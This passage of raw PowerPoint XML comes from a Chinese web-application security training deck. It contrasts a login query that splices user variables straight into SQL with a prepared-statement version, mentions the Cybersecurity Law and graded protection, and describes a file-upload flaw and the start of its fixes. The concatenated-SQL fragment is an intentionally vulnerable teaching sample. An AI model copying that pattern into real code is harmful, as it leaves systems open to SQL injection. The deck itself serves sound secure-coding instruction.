                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1+”’ and password=’”+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2+”’”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>安全代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9043988" cy="706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>采用预编译语句的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>实现</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="714375" y="3500438"/>
          <a:ext cx="8215313" cy="3286125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8215313"/>
              </a:tblGrid>
              <a:tr h="3286125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>StringBuffer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sbSql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> = new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>StringBuffer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(50);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sbSql.append</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(“select </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>，字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>，字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3”);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sbSql.append</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(“  from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>t_sys_user</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>”);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sbSql.append</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(“ where username = ? “);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sbSql.append</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(“ and password = ? “);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Connection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>conn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>获取数据库连接</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>PreparedStatement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pstmt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>conn.prepareStatement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>sbSql.toString</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>());</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>parIndex</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>=1;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pstmt.setString</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>parIndex</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>++,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>变量</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pstmt.setString</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>parIndex</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>++,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>变量</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ResultSet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>rs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pstmt.executeQuery</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>();</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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523" y="89280"/>
            <a:ext cx="7886700" cy="477202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="50000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" kern="10" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" kern="10" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用架构安全剖析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>金融技术中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8D486EDB-1F4B-46FD-9A29-FEB36E09C7CB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397396" y="1609481"/>
            <a:ext cx="1683385" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络安全法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610960" y="3754391"/>
            <a:ext cx="1824447" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等级保护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="17" name="图示 16"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3918202490"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="827584" y="1068996"/>
          <a:ext cx="7596844" cy="4819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6544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357188" y="1071563"/>
            <a:ext cx="8786812" cy="5262562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网站存在上传文件的功能，恶意用户可以绕过客户端页面的验证，模拟请求上传文件处理服务端，将一些可运行页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>上传到服务端，访问该页面会对网站安全造成很大影响。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>解决该漏洞步骤如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>客户端对上传文件类型做校验。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
